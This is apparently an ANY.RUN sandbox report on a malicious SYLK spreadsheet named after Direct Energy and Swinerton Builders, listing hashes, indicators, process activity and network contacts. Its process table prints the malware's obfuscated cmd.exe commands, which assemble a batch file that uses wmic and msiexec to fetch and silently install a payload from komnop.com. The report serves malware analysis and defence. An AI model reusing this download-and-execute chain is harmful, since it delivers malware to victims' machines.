analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Direct Energy & Swinerton Builders.slk

Full analysis: https://app.any.run/tasks/5e9602dc-4846-4f88-9e4a-02e8ed3044e0
Verdict: Malicious activity
Analysis date: March 30, 2020, 15:08:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators, with escape sequences
MD5:

E4F53DC4DCC84D38B033B6D0C7FE48F9

SHA1:

0C093C71E21458481663C2CE771414BCB706141C

SHA256:

41EB7E4D6D96572525A7EACBA3B4D9B1F835F7C30A91FEFE286DB0261BB2ABC3

SSDEEP:

48:Us0ZUdZhdqBbJkrKlL4mDAezvGojQliXTE/rQNmqNRCcCp3L0FQ56+P64c+4c8/z:yOdPdqBbJNnJ3ULuz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 660)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 660)

  • SUSPICIOUS

    • Application launched itself

      • Cmd.exe (PID: 540)
      • Cmd.exe (PID: 1852)
      • cmd.exe (PID: 2396)
      • cmd.exe (PID: 2532)

    • Starts CMD.EXE for commands execution

      • Cmd.exe (PID: 540)
      • Cmd.exe (PID: 1852)
      • cmd.exe (PID: 2532)
      • cmd.exe (PID: 2396)

    • Creates files in the user directory

      • cmd.exe (PID: 1064)

    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 2396)

    • Executed via WMI

      • Msiexec.exe (PID: 3736)

  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 660)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.slk | SYLK - SYmbolic LinK data (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
19
Malicious processes
1
Suspicious processes
4

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe no specs msiexec.exe no specs msiexec.exe

Process information

PID
CMD
Path
Indicators
Parent process
660"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
540Cmd.exe /c EChO|SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms">%appdata%\PfTKB.batC:\Windows\system32\Cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1852Cmd.exe /c @echo off&ping 2 -n 1&echo|set /p="iexec /ihttp^:^/^/^komno">>%appdata%\PfTKB.batC:\Windows\system32\Cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2532cmd.exe /c @echo off&ping 2 -n 2&echo|set /p="p.com/406.php ">>%appdata%\PfTKB.batC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2396cmd.exe /c @echo off&ping 2 -n 3&echo|set /p=" ^/q'">>%appdata%\PfTKB.bat&%appdata%\PfTKB.batC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3604C:\Windows\system32\cmd.exe /S /D /c" EChO"C:\Windows\system32\cmd.exeCmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1064C:\Windows\system32\cmd.exe /S /D /c" SEt /p="@echo off&wm^ic pro^ces^s c^all cr^eat^e 'Ms" 1>C:\Users\admin\AppData\Roaming\PfTKB.bat"C:\Windows\system32\cmd.exeCmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3504ping 2 -n 1C:\Windows\system32\PING.EXECmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1844ping 2 -n 2C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2836ping 2 -n 3C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
857
Read events
797
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
660EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR6B26.tmp.cvr
MD5:
SHA256:
3164cmd.exeC:\Users\admin\AppData\Roaming\PfTKB.battext
MD5:DFD0C5A84799E9AA5EAC539E6B86A50C
SHA256:1488372D485FFAFDA31C0DA159DEDCD739040E62E70823ECC05B01BEF593A461
1064cmd.exeC:\Users\admin\AppData\Roaming\PfTKB.battext
MD5:D86121CD38786A119CBBEAAFA0D806B7
SHA256:64B079425D375B932F90976C9B1FBD929C6E3FF6CB2DF2EA2D2AE69D0365EBB1
3568cmd.exeC:\Users\admin\AppData\Roaming\PfTKB.battext
MD5:A7876C5B5B1E877BF1A20D4AD552E339
SHA256:DE9FB80A3046F5690F4446DCA85CE0DF4C51DD16C7618A0E15056901EAFBE916
2696cmd.exeC:\Users\admin\AppData\Roaming\PfTKB.battext
MD5:21CA1E9AC0D566796389259E0A90F3F6
SHA256:A09D9F552EEF4596D78272270ABEC0CEA6A547ABC48DD68BFE4C69E5A849422D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3580
msiexec.exe
GET
198.54.117.215:80
http://www.komnop.com/406.php?from=@
US
malicious
3580
msiexec.exe
GET
302
162.255.119.170:80
http://komnop.com/406.php
US
html
59 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3580
msiexec.exe
162.255.119.170:80
komnop.com
Namecheap, Inc.
US
suspicious
3580
msiexec.exe
198.54.117.215:80
www.komnop.com
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
komnop.com
  • 162.255.119.170
suspicious
www.komnop.com
  • 198.54.117.215
  • 198.54.117.210
  • 198.54.117.211
  • 198.54.117.212
  • 198.54.117.217
  • 198.54.117.218
  • 198.54.117.216
malicious

Threats

PID
Process
Class
Message
3580
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3580
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Direct Energy & Swinerton Builders.slk